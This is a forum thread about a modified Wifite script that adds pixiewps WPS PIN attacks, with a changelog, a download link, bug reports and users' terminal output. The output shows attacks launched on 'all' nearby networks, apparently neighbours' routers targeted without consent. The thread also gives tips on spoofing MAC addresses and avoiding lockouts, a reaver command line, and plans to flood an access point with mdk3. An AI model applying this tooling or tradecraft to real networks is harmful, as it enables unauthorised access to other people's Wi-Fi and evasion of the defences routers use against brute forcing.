Page 1 of 3 123 LastLast
Results 1 to 50 of 123

Thread: Wifite including new pixiewps attack

  1. #1

    Wifite including new pixiewps attack

    Figured i would just make it it's own thread so it doesn't get lost in everything else.
    Let me know if there are any problems or ideas, still kinda playing around with this and a few other ideas i kinda want to add.

    REQUIRES: Need to have pixiewps and t6x modified reaver installed

    ADDED: Support for new pixiewps attack, attempts a pixiewps attack and if successful passes the key to reaver to test. If fails, continues 11,000 key brute force with reaver.
    Now reports if wps is locked in scanning window(annoyed the excriment out of me that this wasn't shown.)

    ToDo: Maybe add some default pin calculations and checking.
    Make attacks a little more chipset specific(like attemting pin 42000648 on known vulnerable routers, etc...)
    Add option to mdk3 the poopies out of AP in hopes of reseting it.(can't hurt)
    Add a dummy-check to not bork out if modified-reaver or pixiewps isn't installed... :-/

    Changelog:
    04202015 - added timeout to script to avoid hanging if ap doesn't respond
    added flag -pixiet <sec> #adjust timeout of pixie attack
    added flag -ponly #only use pixiewps attack on selected wps networks,
    fixed ctrl^c issue, will now ask to continue or exit completely
    04212015 - added option to skip psk retreaval upon successful pixiewps attack, now runs reaver by default
    04222015 - added updater just run ./wifite -update to update to this fork instead of original wifite
    fixed timer
    fixed issue with new airmon-ng not creating monitor interface
    04232015 - fixed -mac not really anonymizing mac address
    added -endless flag to loop through targets
    made cracked.txt human readable(tab delimited instead of chr(0))
    fixed issue with -paddto not working
    can now anonymize iface already in monitor mode(via macchanger)

    Download:

    https://github.com/aanarchyy/wifite-mod-pixiewps
    Last edited by aanarchyy; 2015-04-24 at 02:34.

  2. #2
    Join Date
    2015-Mar
    Posts
    127
    Nice, glad you added new pixie attacks. Wifite is great program. Used it exclusively until pixiewps, and new reavers came out. Then I had to use the command line more.

    Wifite is also one the the few programs that handles new airmon-ng, well.
    new airmon-ng example:
    airmon-ng wlan3 = wlan3mon (not mon0)

    Im out at the moment, but wifite definitely worked when new airmon-ng already created new monitor interface, then run wifite. Cant remember if could create and use monitor interface of new airmon-ng from beginning. I'll report back

    I'll test this new version for both cases when I get home

  3. #3
    Quote Originally Posted by nuroo View Post
    Nice, glad you added new pixie attacks. Wifite is great program. Used it exclusively until pixiewps, and new reavers came out. Then I had to use the command line more.

    Wifite is also one the the few programs that handles new airmon-ng, well.
    new airmon-ng example:
    airmon-ng wlan3 = wlan3mon (not mon0)

    Im out at the moment, but wifite definitely worked when new airmon-ng already created new monitor interface, then run wifite. Cant remember if could create and use monitor interface of new airmon-ng from beginning. I'll report back

    I'll test this new version for both cases when I get home
    Let me know how it works, if it doesn't, then i should be able to fix it. I havent updated aircrack to test it yet but if it worked in wifite before, it should now also. I am obviously not the author nor even a contributor to wifite, this is just my own little 'fork' that i have found very usefull for myself, and i am releasing it incase it is usefull for anyone else.
    Last edited by aanarchyy; 2015-04-20 at 00:20.

  4. #4
    Join Date
    2015-Mar
    Posts
    127
    Can confirm modified script works if monitor already running. Script picks up wlan3mon right away, and does its thing. If monitor interface is not running, scripts creates it. But since airmon-ng no longer produces mon0, it gets suck in a loop.

    This is only a problem for those that upgraded aircrack-ng suite. Im sure its flawless for everyone else.

  5. #5
    Quote Originally Posted by nuroo View Post
    Can confirm modified script works if monitor already running. Script picks up wlan3mon right away, and does its thing. If monitor interface is not running, scripts creates it. But since airmon-ng no longer produces mon0, it gets suck in a loop.

    This is only a problem for those that upgraded aircrack-ng suite. Im sure its flawless for everyone else.
    Will see if i can fix the monitor creation part of it, like i said, not the origional creator of wifite ;-)
    Can you confirm the pixiewps portion i added works?

  6. #6
    Join Date
    2015-Mar
    Posts
    127
    I had a hard times running it at first. The orginal wifite gets run, even if u run from downloaded directory. I renamed original and went back to download directory and yours ran.

    I can confirm pixiewps portion does work.

    ctrl c, doesn't function like old script however. for instance if attacking 10 targets. If I ctrl c, on 3rd target script ends. Doesn't target 4th. Or option to continue.

    I would like some timeouts for pixie attack. Needed. reaver will wait for long time for beacons, whole script hangs.

  7. #7
    Quote Originally Posted by nuroo View Post
    I had a hard times running it at first. The orginal wifite gets run, even if u run from downloaded directory. I renamed original and went back to download directory and yours ran.

    I can confirm pixiewps portion does work.

    ctrl c, doesn't function like old script however. for instance if attacking 10 targets. If I ctrl c, on 3rd target script ends. Doesn't target 4th. Or option to continue.

    I would like some timeouts for pixie attack. Needed. reaver will wait for long time for beacons, whole script hangs.
    Yeah the ctrl c part i have already noticed also and is on my list, still trying to figure out how the whole script meshes together.
    And yeah, i also noticed the hang while waiting for beacon, yeah a timeout is a good idea, ill look for a way to put that in.

    Thanks for helping me test this

    EDIT: Updated wifite to now timeout after 60 seconds(may make this configurable in the future) if pixiepws is not successful and move on to a regular reaver brute force. Though chances are that if the pixiewps attack fails, more than likely it's a reception/lockout issue in which a regular reaver brute-force attack would also fail.

    Bear with me, kinda learning python as i do this
    Last edited by aanarchyy; 2015-04-20 at 05:33.

  8. #8
    Quote Originally Posted by aanarchyy View Post
    Will see if i can fix the monitor creation part of it, like i said, not the origional creator of wifite ;-)
    Can you confirm the pixiewps portion i added works?
    You have fixed it yet?

  9. #9
    Join Date
    2015-Mar
    Posts
    127
    Good news aanarchyy. Im happy to help. Awesome job so far. I wanna learn scripting too, for now help test.

    Will try new version, report back.

  10. #10
    Join Date
    2015-Mar
    Posts
    127
    Just so I can run original and your wifite, I renamed yours wifitemod:

    Heres output with new version with pixiewps timeout:
    Code:
    ~/wifite-mod-pixiewps-master# ./wifitemod -wps
    
      .;'                     `;,    
     .;'  ,;'             `;,  `;,   WiFite v2 (r85)
    .;'  ,;'  ,;'     `;,  `;,  `;,  
    ::   ::   :   ( )   :   ::   ::  automated wireless auditor
    ':.  ':.  ':. /_\ ,:'  ,:'  ,:'  
     ':.  ':.    /___\    ,:'  ,:'   designed for Linux
      ':.       /_____\      ,:'     
               /       \             
    
    modified by aanarchyy([email protected])
    Credits to wiire,DataHead,soxrok2212,nxxxu
    
     [+] targeting WPS-enabled networks
    
     [+] scanning for wireless devices...
     [+] initializing scan (mon0), updates at 5 sec intervals, CTRL+C when ready.
     [0:00:04] scanning wireless networks. 0 targets and 0 clients found   
    
     [+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.
    
       NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
       --- --------------------  --  ----  -----  ----  ------
        1  DG167****              1  WPA2  36db   Locked 
        2  FiOS-S****             1  WPA2  23db   wps 
        3  SprintGatew****      1  WPA2  21db   wps 
    
     [0:00:32] scanning wireless networks. 3 targets and 2 clients found   
     [+] checking for WPS compatibility... done
     [+] removed 47 non-WPS-enabled targets
    
       NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
       --- --------------------  --  ----  -----  ----  ------
        1  DG167****              1  WPA2  36db   Locked 
        2  TG167****             11  WPA2  25db   wps 
        3  FiOS-S****             1  WPA2  24db   wps 
        4  TDS                    6  WPA2  22db   wps 
        5  TG167****              1  WPA2  21db   wps 
        6  MiamiHEAT             11  WPA2  20db   wps 
        7  U10C0****             1  WPA   18db   wps 
        8  SprintGate****      1  WPA2  18db   wps 
        9  DIRECT-pm-BR****       1  WPA2  18db   wps 
       10  DG167****              1  WPA2  15db   wps 
    
     [+] select target numbers (1-10) separated by commas, or 'all': all
    
     [+] 10 targets selected.
    
     [0:00:00] initializing PixieWPS attack on DG167**** (...........:73:90)
     [+] E-Nonce found
     [+] PKE hash found
     [+] PKR hash found
    
     [!] unable to complete successful try in 60 seconds
     [+] skipping pixiewps on DG167****
    
     [+] Pixiewps attack failed!
    
     [0:00:00] initializing WPS PIN attack on DG167**** (...........:73:90)
    ^C0:00:18] WPS attack, 0/0 success/ttl, 
     (^C) WPS brute-force attack interrupted
    
     [+] 9 targets remain
     [+] what do you want to do?
         [c]ontinue attacking targets
         [e]xit completely
     [+] please make a selection (c, or e): c
    
     [0:00:00] initializing PixieWPS attack on TG167**** (...........:EC:10)
    
     [!] unable to complete successful try in 60 seconds
     [+] skipping pixiewps on TG167****
    
     [+] Pixiewps attack failed!
    
     [0:00:00] initializing WPS PIN attack on TG167**** (...........:EC:10)
    ^C0:00:22] WPS attack, 0/0 success/ttl, 
     (^C) WPS brute-force attack interrupted
    
     [+] 8 targets remain
     [+] what do you want to do?
         [c]ontinue attacking targets
         [e]xit completely
     [+] please make a selection (c, or e): c
    
     [0:00:00] initializing PixieWPS attack on FiOS-S**** (...........:EC:C2)
     [+] E-Nonce found
     [+] PKE hash found
     [+] PKR hash found
     [+] E-Hash1 found
     [+] E-Hash2 found
    Traceback (most recent call last):
      File "./wifitemod", line 3124, in <module>
        main()
      File "./wifitemod", line 321, in main
        need_handshake = not wps_attack(iface, t)
      File "./wifitemod", line 2912, in wps_attack
        line = f.readline()
    UnboundLocalError: local variable 'f' referenced before assignment
    Timeout for pixie worked. but another error above.
    Please make pixie timeout configureable.
    also option if pixewps fail, no brutefructe, move to next target.
    Please consider because failed attempt locked router
    Code:
    For those wondering what reavers -P option is intended for:
    
    Option (-P) in reaver puts reaver into a loop mode that does not do the  WPS protocol to or past the M4 message to hopefully avoid lockouts. This  is to ONLY be used for PixieHash collecting to use with pixiewps, NOT  to 'online' bruteforce pins.
    This option was made with intent of:
    
    ----Collecting repetitive hashes for further comparison and or analysis / discovery of new vulnerable chipsets , routers etc..
    
    ----Time sensistive attacks where the hash collecting continues repetitively until your time frame is met.
    
    ----For scripting purposes of whom want to use a possible lockout preventable way of PixieHash gathering for your Use case.                         
    by datahead

  11. #11
    @noruu fixed typo and added added pixie-loop, will be adding a configureable timeout option for pixie attack and will also add option to only attempt pixie attacks(good idea, i like that)

  12. #12
    Join Date
    2015-Mar
    Posts
    127
    Test parameters:
    Internal wifi card only, quick and dirty.
    Time limited. Netbook with internal wifi card, so all but one targets where to far away.
    The one that was close enough for pixie/reaver attack, the script errored during pixie attack.

    Observations:
    The script handled configurable timeout well. (targets to far anyway)

    When crtl C pressed the script moved on to next target well.

    Need the timer for pixie attack, like timer for wps pin attack.
    (cursor just hangs during pixie. countdown if possible)

    Todo:
    I will test script for fails, against more targets and with a stronger external usb wifi card and then post later.

    Code:
    root***:~/wifite-mod-pixiewps-master# ./wifitemod -wps -pixiet 90
    
      .;'                     `;,    
     .;'  ,;'             `;,  `;,   WiFite v2 (r85)
    .;'  ,;'  ,;'     `;,  `;,  `;,  
    ::   ::   :   ( )   :   ::   ::  automated wireless auditor
    ':.  ':.  ':. /_\ ,:'  ,:'  ,:'  
     ':.  ':.    /___\    ,:'  ,:'   designed for Linux
      ':.       /_____\      ,:'     
               /       \             
    
    modified by aanarchyy([email protected])
    Credits to wiire,DataHead,soxrok2212,nxxxu
    
     [+] targeting WPS-enabled networks
     [+] pixiewps attack timeout set to 90 seconds
    
     [+] scanning for wireless devices...
     [+] initializing scan (mon0), updates at 5 sec intervals, CTRL+C when ready.
     [0:00:04] scanning wireless networks. 0 targets and 0 clients found   
    
     [+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.
    
       NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
       --- --------------------  --  ----  -----  ----  ------
        1  DG167****              1  WPA2  33db   Locked 
        2  TDS                    6  WPA2  17db   wps 
    
     [0:00:25] scanning wireless networks. 2 targets and 2 clients found   
    
     [+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.
    
       NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
       --- --------------------  --  ----  -----  ----  ------
        1  DG167****              1  WPA2  34db   Locked 
        2  TDS                    6  WPA2  24db   wps 
        3  TG167****              1  WPA2  21db   wps 
        4  FiOS-S****            1  WPA2  19db   wps 
        5  HAL9000                6  WPA2  15db   wps 
    
     [0:00:48] scanning wireless networks. 5 targets and 9 clients found   
    
     [+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.
    
       NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
       --- --------------------  --  ----  -----  ----  ------
        1  DG167****              1  WPA2  34db   Locked 
        2  TDS                    6  WPA2  23db   wps 
        3  TG167****              1  WPA2  21db   wps 
        4  FiOS-S****             1  WPA2  16db   wps 
        5  HAL9000                6  WPA2  15db   wps 
    
     [0:01:11] scanning wireless networks. 5 targets and 13 clients found   
     [+] checking for WPS compatibility... done
     [+] removed 49 non-WPS-enabled targets
    
       NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
       --- --------------------  --  ----  -----  ----  ------
        1  DG167****              1  WPA2  34db   Locked 
        2  TDS                    6  WPA2  24db   wps 
        3  TG167****              1  WPA2  20db   wps 
        4  DG167****              1  WPA2  19db   wps 
        5  FiOS-S****             1  WPA2  17db   wps 
        6  HAL9000                6  WPA2  15db   wps 
    
     [+] select target numbers (1-6) separated by commas, or 'all': all
    
     [+] 6 targets selected.
    
     [0:00:00] initializing PixieWPS attack on DG16**** (00:00:00:00:73:90)
    
     [!] unable to complete successful try in 90 seconds
     [+] skipping pixiewps on DG167****
    
     [+] Pixiewps attack failed!
    
     [0:00:00] initializing WPS PIN attack on DG167**** (00:00:00:00:73:90)
    ^C0:00:12] WPS attack, 0/0 success/ttl, 
     (^C) WPS brute-force attack interrupted
    
     [+] 5 targets remain
     [+] what do you want to do?
         [c]ontinue attacking targets
         [e]xit completely
     [+] please make a selection (c, or e): c
    
     [0:00:00] initializing PixieWPS attack on TDS (00:00:00:00:1B:C6)
    
     [!] unable to complete successful try in 90 seconds
     [+] skipping pixiewps on TDS
    
     [+] Pixiewps attack failed!
    
     [0:00:00] initializing WPS PIN attack on TDS (00:00:00:00:1B:C6)
    ^C0:00:25] WPS attack, 0/0 success/ttl, 
     (^C) WPS brute-force attack interrupted
    
     [+] 4 targets remain
     [+] what do you want to do?
         [c]ontinue attacking targets
         [e]xit completely
     [+] please make a selection (c, or e): c
    
     [0:00:00] initializing PixieWPS attack on TG167**** (00:00:00:00:8F:20)
    
     [!] unable to complete successful try in 90 seconds
     [+] skipping pixiewps on TG167****
    
     [+] Pixiewps attack failed!
    
     [0:00:00] initializing WPS PIN attack on TG167**** (00:00:00:00:8F:20)
    ^C0:00:22] WPS attack, 0/0 success/ttl, 
     (^C) WPS brute-force attack interrupted
    
     [+] 3 targets remain
     [+] what do you want to do?
         [c]ontinue attacking targets
         [e]xit completely
     [+] please make a selection (c, or e): c
    
     [0:00:00] initializing PixieWPS attack on DG167**** (00:00:00:00:C4:60)
    
     [!] unable to complete successful try in 90 seconds
     [+] skipping pixiewps on DG167****
    
     [+] Pixiewps attack failed!
    
     [0:00:00] initializing WPS PIN attack on DG167**** (00:00:00:00:C4:60)
    ^C0:00:08] WPS attack, 0/0 success/ttl, 
     (^C) WPS brute-force attack interrupted
    
     [+] 2 targets remain
     [+] what do you want to do?
         [c]ontinue attacking targets
         [e]xit completely
     [+] please make a selection (c, or e): c
    
     [0:00:00] initializing PixieWPS attack on FiOS-S**** (00:00:00:00:EC:C2)
     [+] E-Nonce found
     [+] PKE hash found
     [+] PKR hash found
     [+] E-Hash1 found
     [+] E-Hash2 found
    Traceback (most recent call last):
      File "./wifitemod", line 3134, in <module>
        main()
      File "./wifitemod", line 321, in main
        need_handshake = not wps_attack(iface, t)
      File "./wifitemod", line 2931, in wps_attack
        os.remove(temp + "reaver_err.out")
    OSError: [Errno 2] No such file or directory: '/tmp/wifite0jkPaB/reaver_err.out'
    root@****:~/wifite-mod-pixiewps-master#
    Great progress !!

  13. #13
    Join Date
    2015-Mar
    Posts
    127
    Also on little netbook that I havent upgraded aircrack-ng suite, interface creation/usage perfect.

  14. #14
    Updated!
    Added -pixiet <sec> to configure pixiewps timeout
    Added -ponly to set to only attack using pixiewps
    Fixed ctrl^c issue

  15. #15
    Join Date
    2015-Mar
    Posts
    127
    Code:
    root@kali:~/wifite-mod-pixiewps-master# ./wifitemod -ponly -pixiet 45
    
      .;'                     `;,    
     .;'  ,;'             `;,  `;,   WiFite v2 (r86)
    .;'  ,;'  ,;'     `;,  `;,  `;,  
    ::   ::   :   ( )   :   ::   ::  automated wireless auditor
    ':.  ':.  ':. /_\ ,:'  ,:'  ,:'  
     ':.  ':.    /___\    ,:'  ,:'   designed for Linux
      ':.       /_____\      ,:'     
               /       \             
    
    modified by aanarchyy([email protected])
    Credits to wiire,DataHead,soxrok2212,nxxxu
    
     [+] Pixiewps attack only enabled
     [+] pixie attack timeout set to 45 seconds
    
     [+] scanning for wireless devices...
     [+] initializing scan (mon0), updates at 5 sec intervals, CTRL+C when ready.
     [0:00:04] scanning wireless networks. 0 targets and 0 clients found   
    
     [+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.
    
       NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
       --- --------------------  --  ----  -----  ----  ------
        1  \x00\x00\x001000   6  WPA2  65db   wps 
        2  b0c554a1000           1  WPA2  64db   wps 
        3  DVW32011000             1  WPA2  56db   wps 
        4  atlantis201000       10  WPA2  53db   wps 
        5  WileyR1000            10  WPA2  52db   wps 
        6  DVW321000             1  WPA2  51db   wps 
        7  133 1000  1000             6  WPA2  51db   Locked 
        8  Onyx1100023                1  WPA2  50db   wps 
        9  TommyA1000            6  WPA2  50db   wps 
       10  Kirin1000              1  WPA2  49db   wps 
       11  DG16701000             11  WPA2  48db   wps 
       12  We hear y1000  6  WPA2  48db   wps 
       13  \x00\x00\1000       11  WPA2  47db   wps 
       14  DG11000             11  WPA2  46db   wps 
       15  DG11000              1  WPA2  45db   Locked 
       16  Tuppy Gl1000          6  WPA2  45db   Locked 
       17  lind1000          11  WPA2  44db   wps 
       18  DG11000              1  WPA2  40db   Locked 
    
     [0:00:06] scanning wireless networks. 18 targets and 3 clients found   
    
     [+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.
    
       NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
       --- --------------------  --  ----  -----  ----  ------
        1  \x00\x00\x001000   6  WPA2  65db   wps 
        2  b0c554a1000           1  WPA2  64db   wps 
        3  DVW32011000             1  WPA2  56db   wps 
        4  atlantis201000       10  WPA2  53db   wps 
        5  WileyR1000            10  WPA2  52db   wps 
        6  DVW321000             1  WPA2  51db   wps 
        7  133 1000  1000             6  WPA2  51db   Locked 
        8  Onyx1100023                1  WPA2  50db   wps 
        9  TommyA1000            6  WPA2  50db   wps 
       10  Kirin1000              1  WPA2  49db   wps 
       11  DG16701000             11  WPA2  48db   wps 
       12  We hear y1000  6  WPA2  48db   wps 
       13  \x00\x00\1000       11  WPA2  47db   wps 
       14  DG11000             11  WPA2  46db   wps 
       15  DG11000              1  WPA2  45db   Locked 
       16  Tuppy Gl1000          6  WPA2  45db   Locked 
       17  lind1000          11  WPA2  44db   wps 
       18  DG11000              1  WPA2  40db   Locked 
    
     [0:00:21] scanning wireless networks. 18 targets and 3 clients found   
    
     [+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.
    
       NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
       --- --------------------  --  ----  -----  ----  ------
        1  \x00\x00\x001000   6  WPA2  65db   wps 
        2  b0c554a1000           1  WPA2  64db   wps 
        3  DVW32011000             1  WPA2  56db   wps 
        4  atlantis201000       10  WPA2  53db   wps 
        5  WileyR1000            10  WPA2  52db   wps 
        6  DVW321000             1  WPA2  51db   wps 
        7  133 1000  1000             6  WPA2  51db   Locked 
        8  Onyx1100023                1  WPA2  50db   wps 
        9  TommyA1000            6  WPA2  50db   wps 
       10  Kirin1000              1  WPA2  49db   wps 
       11  DG16701000             11  WPA2  48db   wps 
       12  We hear y1000  6  WPA2  48db   wps 
       13  \x00\x00\1000       11  WPA2  47db   wps 
       14  DG11000             11  WPA2  46db   wps 
       15  DG11000              1  WPA2  45db   Locked 
       16  Tuppy Gl1000          6  WPA2  45db   Locked 
       17  lind1000          11  WPA2  44db   wps 
       18  DG11000              1  WPA2  40db   Locked 
       19  linda1000           11  WPA2  45db   wps 
       20  \x00\x00\x00\x00\...  11  WPA2  45db   wps 
       21  ZOOM                   6  WPA2  44db   wps 
       22  DG1671000              1  WPA2  41db   Locked 
       23  McPo1000               6  WPA2  40db   wps 
       24  DG1671000              1  WPA2  40db   Locked 
    
     [0:00:29] scanning wireless networks. 24 targets and 14 clients found   
     [+] checking for WPS compatibility... done
     [+] removed 35 non-WPS-enabled target
    
    
       NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
       --- --------------------  --  ----  -----  ----  ------
        1  \x00\x00\x001000   6  WPA2  65db   wps 
        2  b0c554a1000           1  WPA2  64db   wps 
        3  DVW32011000             1  WPA2  56db   wps 
        4  atlantis201000       10  WPA2  53db   wps 
        5  WileyR1000            10  WPA2  52db   wps 
        6  DVW321000             1  WPA2  51db   wps 
        7  133 1000  1000             6  WPA2  51db   Locked 
        8  Onyx1100023                1  WPA2  50db   wps 
        9  TommyA1000            6  WPA2  50db   wps 
       10  Kirin1000              1  WPA2  49db   wps 
       11  DG16701000             11  WPA2  48db   wps 
       12  We hear y1000  6  WPA2  48db   wps 
       13  \x00\x00\1000       11  WPA2  47db   wps 
       14  DG11000             11  WPA2  46db   wps 
       15  DG11000              1  WPA2  45db   Locked 
       16  Tuppy Gl1000          6  WPA2  45db   Locked 
       17  lind1000          11  WPA2  44db   wps 
       18  DG11000              1  WPA2  40db   Locked 
       19  linda1000           11  WPA2  45db   wps 
       20  \x00\x00\x00\x00\...  11  WPA2  45db   wps 
       21  ZOOM                   6  WPA2  44db   wps 
       22  DG1671000              1  WPA2  41db   Locked 
       23  McPo1000               6  WPA2  40db   wps 
       24  DG1671000              1  WPA2  40db   Locked 
       25  McP1000               6  WPA2  42db   wps   client
       26  DG1671000              1  WPA2  42db   Locked 
       27  DG1671000              1  WPA2  41db   Locked 
       28  TG1671000              6  WPA2  40db   wps 
       29  THWL9                  1  WPA2  38db   wps 
    
     [+] select target numbers (1-29) separated by commas, or 'all': all
    
     [+] 29 targets selected.
    
     [0:00:00] initializing PixieWPS attack on \x00\x00\x00\x00\x00\x 1000:79:0F)
    
     [!] unable to complete successful try in 45 seconds
     [+] skipping pixiewps on \x00\x00\x00\x00\x00\x
    
     [!] unable to complete successful try in 45 seconds
     [+] skipping pixiewps on \x00\x00\x00\x00\x00\x
    
     [!] unable to complete successful try in 45 seconds
     [+] skipping pixiewps on \x00\x00\x00\x00\x00\x
    
     [!] unable to complete successful try in 45 seconds
     [+] skipping pixiewps on \x00\x00\x00\x00\x00\x
    
     [!] unable to complete successful try in 45 seconds
     [+] skipping pixiewps on \x00\x00\x00\x00\x00\x
    
     [!] unable to complete successful try in 45 seconds
     [+] skipping pixiewps on \x00\x00\x00\x00\x00\x
    
     [!] unable to complete successful try in 45 seconds
     [+] skipping pixiewps on \x00\x00\x00\x00\x00\x
    
     [!] unable to complete successful try in 45 seconds
     [+] skipping pixiewps on \x00\x00\x00\x00\x00\x
    ^C
     (^C) WPS brute-force attack interrupted
    
     [+] 28 targets remain
     [+] what do you want to do?
         [c]ontinue attacking targets
         [e]xit completely
     [+] please make a selection (c, or e): c
    
    
     (^C) WPS brute-force attack interrupted
    
     [+] 27 targets remain
     [+] what do you want to do?
         [c]ontinue attacking targets
         [e]xit completely
     [+] please make a selection (c, or e): c
    
     [+] Pixiewps attack failed!
    
     [0:00:00] initializing PixieWPS attack on b0c554a1000 (1000:A7:86)
    
     [!] unable to complete successful try in 45 seconds
     [+] skipping pixiewps on b0c554a1000
    
     [!] unable to complete successful try in 45 seconds
     [+] skipping pixiewps on b0c554a1000
    
     [!] unable to complete successful try in 45 seconds
     [+] skipping pixiewps on b0c554a1000
    
     [!] unable to complete successful try in 45 seconds
     [+] skipping pixiewps on b0c554a1000
    
     [!] unable to complete successful try in 45 seconds
     [+] skipping pixiewps on b0c554a1000
    ^C
     (^C) WPS brute-force attack interrupted
    
     [+] 26 targets remain
     [+] what do you want to do?
         [c]ontinue attacking targets
         [e]xit completely
     [+] please make a selection (c, or e): ^C
     (^C) WPS brute-force attack interrupted
    
     [+] 26 targets remain
     [+] what do you want to do?
         [c]ontinue attacking targets
         [e]xit completely
     [+] please make a selection (c, or e): ^CTraceback (most recent call last):
      File "./wifitemod", line 3150, in <module>
        if attack_interrupted_prompt():
      File "./wifitemod", line 1801, in attack_interrupted_prompt
        ri = raw_input(GR+' [+]'+W+' please make a selection (%s): ' % options)
    KeyboardInterrupt
    Stuck in loop after pixie attack fails

  16. #16
    Join Date
    2015-Mar
    Posts
    127
    if ./wifite -pixiet (no time given)

    script handles ./wifite -pixiet<null> nicely.

    Also in previous version -ponly had no acknolegdement of being set to active, this version says its active.
    Last edited by nuroo; 2015-04-21 at 01:51.

  17. #17
    Quote Originally Posted by nuroo View Post
    [CODE]

    Stuck in loop after pixie attack fails
    Yeah, just noticed that also, gimme a min to fix, just had it fixed then testbed crashed so i gotta remember what i did... :-/

    Edit: Should be fixed now. I want to thank you again for helping me test this
    Last edited by aanarchyy; 2015-04-21 at 02:03.

  18. #18
    Join Date
    2015-Mar
    Posts
    127
    ./wifite -ponly -pixiet 75 -pow 35

    Worked no errors. 8 targets. Ctrl'C on a few I knew wouldn't crack, no crash. -NICE

    No successful pixie attack though. Gonna increase timeout test pixie attack portion.

  19. #19
    Join Date
    2015-Mar
    Posts
    127
    When given enough info for successful attack against known vulnerable AP:
    [0:00:00] initializing PixieWPS attack on DG167000 (0000000:27:80)
    [+] E-Nonce found
    [+] PKE hash found
    [+] PKR hash found
    [+] Authkey found
    [+] E-Hash1 found
    [+] E-Hash2 found
    script seems to stand still, no error but no output

    Is that because -P option used in reaver? If -P option loop used, so no M4, so no wps lockout?

    If so Then do you feed successful results to offline pixie attack to obtain pin? the new reaver to test pin?

  20. #20
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by nuroo View Post
    When given enough info for successful attack against known vulnerable AP:
    [0:00:00] initializing PixieWPS attack on DG167000 (0000000:27:80)
    [+] E-Nonce found
    [+] PKE hash found
    [+] PKR hash found
    [+] Authkey found
    [+] E-Hash1 found
    [+] E-Hash2 found
    script seems to stand still, no error but no output

    Is that because -P option used in reaver? If -P option loop used, so no M4, so no wps lockout?

    If so Then do you feed successful results to offline pixie attack to obtain pin? the new reaver to test pin?
    Yeah, the -P switch will stop M4 from being sent at all. Just run reaver after and supply the correct pin.

  21. #21
    Yeah, didn't exit the loop properly, oops! O.o
    Should be all fixed now

  22. #22
    Join Date
    2014-Nov
    Posts
    8
    @aanarchyy,
    Is your Wifite based on derv82 's code?
    As I recall bwall, drone and brianpow consecutively modified the Wifite code to r95.
    Latest Wifite was on https://github.com/brianpow/wifite afaik...
    Last edited by SubZero5; 2015-04-21 at 07:16.

  23. #23
    Join Date
    2015-Mar
    Posts
    127
    Posted two new issues to your git, aanarchyy.

    Question - if wifite finds a client, does it spoof the mac of client?
    Question - if mon0 is already started a fake mac address, does wifite pass the fake/spoofed mac address when using reaver (ex. reaver -i mon0 -b 11:22:33:44:55:66 --mac=00:11:00:11:00:11 -vv -S -K1)

  24. #24
    Join Date
    2015-Mar
    Posts
    127
    deleted double post
    Last edited by nuroo; 2015-04-21 at 12:41. Reason: double post

  25. #25
    Join Date
    2015-Mar
    Posts
    127
    Quote Originally Posted by SubZero5 View Post
    @aanarchyy,
    Is your Wifite based on derv82 's code?
    As I recall bwall, drone and brianpow consecutively modified the Wifite code to r95.
    Latest Wifite was on https://github.com/brianpow/wifite afaik...
    just checked out that version SubZero. Nice. alots of cool improvements. But it came out b4 pixiewps and modded reaver, so lacking that functionality.

  26. #26
    @Subzero5
    The one i am working with is the one that came on Kali. I may update it and add my patches in soon. Any specific features in that one?

    @nuroo
    1) No, but that was an idea i had been thinking of adding in.
    2) If it's already spoofed, there is no reason to use the --mac flag as it is already spoofed.
    3) Check the first issue you posted on github and confirm it's fixed for me please :-)

    Updated to now run reaver automatically unless explicitly told to skip psk retrevial vai -pixienopsk flag

    Still trying to figure out the whole updating timer thing, picking up python as i go along here
    Last edited by aanarchyy; 2015-04-21 at 15:45.

  27. #27
    Join Date
    2015-Mar
    Posts
    127
    Im pretty sure reaver doesnt use spoofed mac address for monitor unless --mac option is given.


    i'll test for same issue now. but maybe results later, quick lunch

  28. #28
    Join Date
    2015-Mar
    Posts
    127
    airmon-ng also does not copy spoofed mac address to monitor. after airmon-ng creates monitor, i still take it down and run macchanger and assign same spoofed mac address to monitor. that is the reason I always create monitor before running wifite........i believe thats the reason for --mac in reaver.
    Last edited by nuroo; 2015-04-21 at 18:05.

  29. #29
    Join Date
    2015-Mar
    Posts
    127
    Consider a version or revision number.....for us track changes/fixes. and to know if im reporting on current revision.

  30. #30
    What behavior were you thinking for the spoofing part?

    Specify address to spoof at command line?
    Wait until client found then start attack with spoofed address?
    Start attacking unspoofed and watch at same time, and when client found, restart attack with spoofed address?
    If multiple clients found, rotate addresses so often?

  31. #31
    Join Date
    2015-Mar
    Posts
    127
    aanarchyy only because you asked, other wifite -h output.........no pressure.
    Code:
     .;'                     `;,    
     .;'  ,;'             `;,  `;,   WiFite v2 (r95)
    .;'  ,;'  ,;'     `;,  `;,  `;,  
    ::   ::   :   ( )   :   ::   ::  automated wireless auditor
    ':.  ':.  ':. /_\ ,:'  ,:'  ,:'  
     ':.  ':.    /___\    ,:'  ,:'   designed for Linux
      ':.       /_____\      ,:'     
               /       \             
    
    usage: wifite92.py [-h] [--check [file]] [--cracked] [--recrack] [-i [wlanN]]
                       [--mac] [-m [monN]] [--tx [N]] [-l [file]] [-v [file]]
                       [-s [filters]] [-t [criteria]] [-c [N]] [--power [N]]
                       [--all] [-r [N]] [--showb] [-2] [-q] [-a [filters]]
                       [-e [SSID]] [-b [BSSID]] [--wpa] [--wpat [secs]] [--nowpa]
                       [--wpadt [secs]] [--strip] [--crack CRACK] [--dict [file]]
                       [--hash [file]] [--recapture] [--aircrack] [--pyrit]
                       [--tshark] [--cowpatty] [--wep] [--pps [N]] [--wept [secs]]
